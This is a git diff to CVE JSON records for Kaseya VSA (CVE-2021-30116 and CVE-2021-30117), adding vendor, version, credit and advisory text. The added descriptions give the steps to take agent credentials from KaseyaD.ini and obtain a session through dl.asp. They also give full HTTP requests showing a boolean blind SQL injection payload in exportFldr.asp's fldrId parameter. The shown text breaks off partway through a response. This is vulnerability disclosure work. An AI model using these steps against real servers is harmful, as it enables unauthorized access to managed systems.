diff --git a/2021/30xxx/CVE-2021-30116.json b/2021/30xxx/CVE-2021-30116.json
index 89a325ef7c3..c895e7c2320 100644
--- a/2021/30xxx/CVE-2021-30116.json
+++ b/2021/30xxx/CVE-2021-30116.json
@@ -12,18 +12,20 @@
"product": {
"product_data": [
{
- "product_name": "n/a",
+ "product_name": "Kaseya VSA (on premise)",
"version": {
"version_data": [
{
- "version_value": "n/a"
+ "version_affected": "<=",
+ "version_name": "9.x",
+ "version_value": "9.5.6"
}
]
}
}
]
},
- "vendor_name": "n/a"
+ "vendor_name": "Kaseya"
}
]
}
@@ -31,11 +33,11 @@
"credit": [
{
"lang": "eng",
- "value": "Discovered by Wietse Boonstra"
+ "value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
- "value": "Additional research by Frank Breedijk"
+ "value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
@@ -45,7 +47,7 @@
"description_data": [
{
"lang": "eng",
- "value": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021."
+ "value": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021.\n\nBy default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp\n\nWhen an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword\n\nThis Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9)\n\nThis request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication.\n\nSecurity issues discovered\n---\n* Unauthenticated download page leaks credentials\n* Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents\n* dl.asp accepts credentials via a GET request\n* Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients.\n\nImpact\n---\nVia the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system. \n"
}
]
},
@@ -74,7 +76,7 @@
"description": [
{
"lang": "eng",
- "value": "n/a"
+ "value": "CWE-200 Information Exposure"
}
]
}
diff --git a/2021/30xxx/CVE-2021-30117.json b/2021/30xxx/CVE-2021-30117.json
index 838c31f58a7..1b88897232d 100644
--- a/2021/30xxx/CVE-2021-30117.json
+++ b/2021/30xxx/CVE-2021-30117.json
@@ -1,22 +1,9 @@
{
- "data_type": "CVE",
- "data_format": "MITRE",
- "data_version": "4.0",
- "generator": {
- "engine": "Vulnogram 0.0.9"
- },
"CVE_data_meta": {
- "ID": "CVE-2021-30117",
"ASSIGNER": "cve@mitre.org",
- "DATE_PUBLIC": "",
- "TITLE": "Authenticated SQL injection in Kaseya VSA < v9.5.6",
- "AKA": "",
- "STATE": "PUBLIC"
- },
- "source": {
- "defect": [],
- "advisory": "DIVD-2021-00011",
- "discovery": "UNKNOWN"
+ "ID": "CVE-2021-30117",
+ "STATE": "PUBLIC",
+ "TITLE": "Authenticated SQL injection in Kaseya VSA < v9.5.6"
},
"affects": {
"vendor": {
@@ -25,84 +12,104 @@
"product": {
"product_data": [
{
- "product_name": "n/a",
+ "product_name": "Kaseya VSA (on premise and SaaS)",
"version": {
"version_data": [
{
- "version_value": "n/a"
+ "version_affected": "<",
+ "version_name": "9.x",
+ "version_value": "9.5.6"
+ }
+ ]
+ }
+ },
+ {
+ "product_name": "Kaseya VSA Agent",
+ "version": {
+ "version_data": [
+ {
+ "version_affected": "<",
+ "version_name": "9.x",
+ "version_value": "9.5.0.23"
}
]
}
}
]
},
- "vendor_name": "n/a"
+ "vendor_name": "Kaseya"
}
]
}
},
+ "credit": [
+ {
+ "lang": "eng",
+ "value": "Discovered by Wietse Boonstra of DIVD"
+ },
+ {
+ "lang": "eng",
+ "value": "Additional research by Frank Breedijk of DIVD"
+ }
+ ],
+ "data_format": "MITRE",
+ "data_type": "CVE",
+ "data_version": "4.0",
+ "description": {
+ "description_data": [
+ {
+ "lang": "eng",
+ "value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.\n\nDetailed description\n---\n\nGiven the following request:\n```\nGET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nWhere the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure.\n\nResponse:\n```\nHTTP/1.1 500 Internal Server Error\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 19:12:11 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 881\n \n\n\n \n\n \tWhoops.\n \n \n \n\t\n \n----SNIP----\n```\n\nHowever when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed.\n\nRequest:\n```\nGET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 17:33:53 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 7960\n \n \n\n\nExport Folder\n